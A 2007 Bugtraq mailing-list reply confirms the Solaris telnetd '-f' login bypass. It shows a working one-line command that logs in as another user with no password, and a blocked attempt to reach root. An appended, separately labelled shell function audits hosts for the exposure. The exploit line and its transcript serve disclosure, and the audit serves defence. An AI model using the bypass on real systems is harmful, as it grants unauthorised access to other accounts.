Bugtraq mailing list archives
Re: Solaris telnet vulnberability - how many on your network?
From: Leandro Gelasi <leandro.gelasi () tiscali it>
Date: Wed, 14 Feb 2007 11:41:17 +0100
On Monday 12 February 2007 07:00, Gadi Evron wrote:
Update from HD Moore: "but this bug isnt -froot, its -fanythingbutroot =P"
Confirmed. If the server permits logins from outside (maybe via SSH only - protection provided by a local or network) and has telnetd enabled, any user can log in as another user with no password. I mean:

$> ssh user1@sol10_server.dom
password: ********
user1@sol10_server>telnet -l "-fuser2" localhost
<no pass required>
user2@sol10_server>

On my Solaris 10 server I wasn't able to obtain root privileges this way, trying:

$>telnet -l "-froot" localhost (or IP from the local net)

I got:

Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Not on system console
Connection to localhost closed by foreign host.

It seems that root cannot log in on non-system consoles. This server hosts SunRay Server Software 3.1, maybe the different configuration is coming from there.

See you
LG
--
**************************************************************************
Leandro Gelasi
email : leandro.gelasi () tiscali it
Gilles Villeneuve will live forever
**************************************************************************
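An audit sketch for the two conditions the message above turns on, added here as an example and not part of the original post: whether the telnet service is online, and whether root logins are restricted to the console. It assumes the Solaris 10 SMF service name svc:/network/telnet:default and that the "Not on system console" refusal comes from an uncommented CONSOLE= entry in /etc/default/login; the function name, result labels and sample inputs are constructed for illustration.

```shell
# Added example. Inputs are files, so saved copies from many hosts can be checked:
#   $1 = output of: svcs -H -o state,fmri svc:/network/telnet:default
#   $2 = a copy of /etc/default/login
audit_telnet_exposure() {
    svcs_out=$1
    login_defaults=$2
    # First column is the SMF state of the telnet service (empty if not listed).
    telnet_state=$(awk '$2 ~ /network\/telnet/ { print $1; exit }' "$svcs_out")
    # Only an uncommented CONSOLE= line counts; the last one wins.
    console=$(sed -n 's/^[[:space:]]*CONSOLE=\(.*\)$/\1/p' "$login_defaults" | tail -1)
    if [ "$telnet_state" != "online" ]; then
        echo "OK telnet=${telnet_state:-absent}"
    elif [ -n "$console" ]; then
        # Matches the behaviour in the post: other accounts reachable, root refused.
        echo "EXPOSED-USERS telnet=online root-console=$console"
    else
        # Nothing restricts root to the console on this host.
        echo "EXPOSED-ALL telnet=online root-console=unset"
    fi
}

# Constructed sample inputs (not captured from a real host).
demo() {
    tmp=$(mktemp -d)
    printf 'online         svc:/network/telnet:default\n' > "$tmp/svcs"
    printf '# sample login defaults\nCONSOLE=/dev/console\n' > "$tmp/login"
    audit_telnet_exposure "$tmp/svcs" "$tmp/login"
    rm -rf "$tmp"
}
demo
```

Any result other than OK means the service should be disabled (svcadm disable svc:/network/telnet) until the host is patched.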